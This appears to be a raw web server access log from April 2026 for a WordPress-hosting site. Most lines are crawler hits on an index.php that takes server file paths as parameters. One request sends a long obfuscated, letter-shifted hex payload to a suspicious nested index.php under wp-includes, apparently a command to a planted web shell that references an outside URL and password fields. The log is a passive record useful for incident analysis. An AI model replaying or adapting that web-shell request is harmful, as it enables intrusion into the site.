216.73.217.33 - - [19/Apr/2026:09:54:41 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0299-kopya-653x375.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2869 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.195.244.41 - - [19/Apr/2026:09:54:44 +0300] "GET /detail/712241204 HTTP/2" 200 6973 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.217.33 - - [19/Apr/2026:09:54:45 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-content%2Fthemes%2Ftoppic%2Flanguages%2Ffr_FR.mo&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fsubdomains%2Fserhatburke%2Fwp-content%2Fthemes%2Ftoppic%2Flanguages HTTP/2" 200 2868 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:54:49 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2FDJI_0123-kopya-480x160.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2870 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.216.113.70 - - [19/Apr/2026:09:52:52 +0300] "GET /wp-includes/block-supports/block-supports/index.php?ARRAY=7o2230223n313737363538353137322p2231223n22687474703n5p2s5p2s7n733830357631336o6s2r61726368796973682r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737363538313537322q3238343139303530313939653531626362383062366431666435396564326233222p2232223n223932643065616235646562393731363665653939613364353236323363323436222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231372q34382q35312q36382q37342q38372q3330227q HTTP/1.0" 500 567 "-" "-"
216.73.217.33 - - [19/Apr/2026:09:54:53 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0332-kopya-653x375.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2870 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:54:57 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0332-kopya-960x320.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2868 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.33 - - [19/Apr/2026:09:55:01 +0300] "GET /index.php?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03%2F488A0240-kopya-720x400.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fmiroglu.net%2Fhttpdocs%2Fwp-content%2Fuploads%2F2023%2F03 HTTP/2" 200 2867 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
